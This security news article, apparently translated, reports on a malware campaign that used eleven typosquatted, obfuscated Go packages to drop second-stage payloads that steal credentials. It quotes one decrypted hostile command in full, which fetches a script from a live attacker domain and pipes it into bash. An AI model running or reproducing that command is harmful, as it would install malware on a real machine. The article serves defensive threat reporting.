HomeSecurityHackers weaponize malicious Gopackages and deliver payloads

Hackers weaponize malicious Gopackages and deliver payloads

Cybersecurity researchers have uncovered an advanced malicious software campaign targeting the Go ecosystem via eleven malicious Gopackages that use advanced obfuscation techniques to deliver second‑stage payloads.

See also: Linux malware Koske hides in images of panda bears

malicious Gopackages

This campaign shows a worrying evolution in supply chain attacks, exploiting the decentralized nature of Go's module system to distribute malicious code that can compromise both Linux build servers and Windows workstations.

The malicious Gopackages use identical pointer-based cloaking routines that hide their true functionality from static analysis tools. When executed, the code silently creates system shells and retrieves executable payloads from command and control servers hosted on alternating .icu and .tech.

Most worryingly, ten of these packages remain active in the Go Module, giving threat actors permanent access to any development environment they inject them into.

Socket.dev analysts identified that eight of the eleven packages are sophisticated typosquats of legitimate Go modules, carefully crafted to appear trustworthy to developers conducting routine dependency searches. The researchers found that six of the ten malicious URLs remain accessible, indicating an active and ongoing threat to the software development community .

See also: Anatsa: Banking trojan reappears on Google Play

Hackers weaponize malicious Gopackages and deliver payloads
Hackers weaponize malicious Gopackages and deliver payloads

The malicious actor exploits Go's decentralized package management system, where modules are imported directly from GitHub repositories rather than through centralized registries like npm or PyPI. This creates namespace confusion that attackers exploit by creating similar module names with different maintainers, making it difficult for developers to distinguish legitimate packages from malicious rogues.

The malware uses a consistent obfuscation technique across all malicious Gopackages, using array-based decoders to reconstruct malicious commands at runtime. The decrypted code follows a predictable pattern, creating arrays of strings and calling different pointers to construct system commands that download and execute remote payloads.

For example, the package github.com/expertsandba/opt contains decrypted code that, when decrypted, executes: /bin/sh -c wget -O – https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &. This command downloads a bash script directly into memory and executes it in the background without writing to disk, allowing for discreet payload delivery.

See also: Hackers target developers with 35 malicious npm packages

The second-stage payloads demonstrate advanced evasion techniques, implementing a one-hour sleep delay to bypass sandbox analysis systems. Once activated, the malicious software enumerates system information, collects browser credentials, and establishes persistent access via continuous network beaconing to an external command-and-control infrastructure.

Selecting the team

🔒 Protect your privacy with Proton VPN

Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.

  • ✔ No-logs, based in Switzerland (except 14-Eyes)
  • ✔ NetShield: blocks ads, trackers & malicious domains
  • ✔ Covers all devices — free version available
Try Proton VPN for free — 30-day money-back guarantee →

The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Absentee Mia
Absentee Miahttps://www.secnews.gr/politiki-syntaxis/
Member of the Editorial Team of SecNews. He writes about cybersecurity, online fraud, privacy and technology. All articles follow the SecNews Editorial Policy.

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS